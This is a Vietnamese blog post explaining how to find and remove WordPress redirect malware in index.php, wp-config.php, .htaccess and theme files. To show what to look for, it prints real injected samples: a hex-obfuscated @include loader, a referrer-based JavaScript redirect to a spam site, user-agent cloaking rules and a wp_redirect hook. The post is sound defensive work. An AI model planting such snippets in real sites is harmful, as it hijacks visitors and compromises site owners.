Xử Lý WordPress Malware Redirect - MTD SEC

MTD SEC

Chia Sẻ Để Thành Công

Home Top Ad

Post Top Ad

Thứ Tư, 3 tháng 10, 2018

Xử Lý WordPress Malware Redirect


Hôm nay có một thành viên cũ của VHB có hỏi mình về cách xử lý mã độc cho wordpress bị chuyển hướng sang một website khác thì xử lý nó như thế nào? trong bài viết này mình sẽ cố gắng tổng hợp tất cả các trường hợp có thể chuyển hướng trang của bạn đi chỗ khác.





Đầu tiên chúng ta cần xác định được domain bị chuyển hướng tới ở đây mình quy định như sau:





domain nhiễm mã độc là vouu.vn





Domain bị chuyển hướng tới là malware.vn





vào một ngày đẹp trời domain vouu.vn của mình bất ngờ bị chuyển hướng tới malware.vn bây giờ chúng ta đi xử lý như thế nào?





Bước 1: Tải toàn bộ code và database về máy tính và cài lại lên XAMPP còn cài như thế nào thì các bạn có thể kiếm bài hướng dẫn trên google.vn trong phạm vi bài này mình không đề cập.





Bước 2: Xử lý code





Dùng sublime text chọn mở toàn bộ thư mục của code trong tùy chọn file => open folder.. chọn thư mục code









và rồi nó sẽ có giao diện như dưới đây





File chúng ta cần chú ý đầu tiên là index.php và wp-config.php chúng ta tiến hành kiểm tra 2 file này nếu có nội dung như sau





@include "\057h\157m\145/\162e\144e\171e\147r\057p\165b\154i\143_\150t\155l\057a\154t\145c\150.\147r\057s\151t\145/\160r\157f\151l\145s\057t\145s\164i\156g\057.\071a\0703\060c\0676\056i\143o";





Nghĩa là nó chứa @include và một đoạn mã hex mã hóa đằng sau thì nó chính là mã độc và nguyên nhân gây chuyển hướng và chúng ta cần giải mã đám mã hóa đó để coi nó gọi file nào ví dụ trên thì file nó ở đây





@include "/home/redeyegr/public_html/altech.gr/site/profiles/testing/.9a830c76.ico";





Như vậy chúng ta vào xóa file .9a830c76.ico là tạm thời chúng ta đã loại bỏ một mã độc ngoài ra website chạy wordpress là php nếu có file index.html thì các bạn cũng nên xóa nó đi





Chúng ta có thể so sánh với các đoạn code mặc định của wordpress tại github của wordpress tại link sau để biết code có bị chỉnh sửa hay không 2 file này mặc định và không cần sửa nội dung nên nếu bị sửa thì có mã độc:





https://github.com/WordPress/WordPress





Ngoài ra những đoạn mã như dưới đây trong file wp-config.php cũng gây ra chuyển hướng





define('WP_HOME','http://malware.vn');
define('WP_SITEURL','http://example.com');




Vấn đề tiếp theo là chúng ta truy cập máy tính không có chuyển trang mà cứ vào điện thoại lại dính chuyển trang vậy nó là do đâu? xử lý như thế nào?





vấn đề này do file .htaccess đối với file này mặc định chúng ta lấy code tại đây





https://codex.wordpress.org/htaccess



Tuy nhiên khi chúng ta cài các plugin thì file này có thể thay đổi nội dung chúng ta sẽ tìm cacsc đoạn như sau





RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]




chúng ta cần tìm từ khóa "HTTP_USER_AGENT" nếu có hãy xóa nó đi những đoạn mã trên sẽ gây chuyển hướng cho một mục tiêu cụ thể không phải toàn bộ,





Bây giờ chúng ta kiểm tra theme chúng ta đang dùng các file: Header.php, footer.php, functions.php





File:  Header.php





Nếu bạn có thấy đoạn mã mã hóa thì nó là mã độc hoặc một số hàm khó hiểu kiểu random hay như $K. #k... thì nó là mã độc ví dụ như hình bên dưới chú ý tới base64 loại mã hóa mã độc thường sử dụng





Malware chưa giải mã












Có một logic đằng sau mã. Nó sẽ chỉ chuyển hướng khách truy cập đến default7.com nếu trong trường hợp đó là lượt truy cập đầu tiên thì nó có thể đặt cookie 896diC9OFnqeAcKGN7fW trong khoảng 1 năm. để theo dõi khách truy cập quay lại.





File tiếp theo là  footer.php cũng tương tự như file header.php





Ngoài ra cũng cần lưu ý các đoạn mã script như sau:





echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {  self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>




Tùy thuộc vào trình duyệt và IP mà người dùng có thể được chuyển hướng đến bất kỳ miền ngẫu nhiên nào được liệt kê bên dưới





  • test0 .com
  • distinctfestive .com
  • malware.vn




file function chúng ta chú ý hàm chuyển hướng wp_redirect





ví dụ như đoạn code dưới đây





add_action( 'template_redirect', 'my_callback' );
function my_callback() {
if ( some_condition() ) {
wp_redirect( "http://malware.vn/", 301 );
exit();
}
}




đây là cách chuyển hướng các trang cụ thể của bạn tới link định trước của hacked.





Mời các bạn đón đọc phần 2 xử lý database mình sẽ nó ở phần sau về mã độc chuyển hướng!


4 nhận xét:

  1. Bài viết rất bổ ích ạ.
    Cho e hỏi làm như nào để hạn chế bị chuyển hướng như này ạ? Host e có 3 domain mà cả 3 đều bị, như vậy là do lỗi của e hay của host ạ?

    Trả lờiXóa
  2. hạn chế thì khó lắm nếu trên host của bạn đã nhiễm virus rồi cái này cần phải kiểm tra lại code của mình, rồi phân quyền file hạn chế chỉnh sửa nữa bạn a!

    Trả lờiXóa
  3. Bài viết rất bổ ích ạ.
    Cho e hỏi làm như nào để hạn chế bị chuyển hướng như này ạ? Host e có 3 domain mà cả 3 đều bị, như vậy là do lỗi của e hay của host ạ?

    Trả lờiXóa
  4. hạn chế thì khó lắm nếu trên host của bạn đã nhiễm virus rồi cái này cần phải kiểm tra lại code của mình, rồi phân quyền file hạn chế chỉnh sửa nữa bạn a!

    Trả lờiXóa

Post Top Ad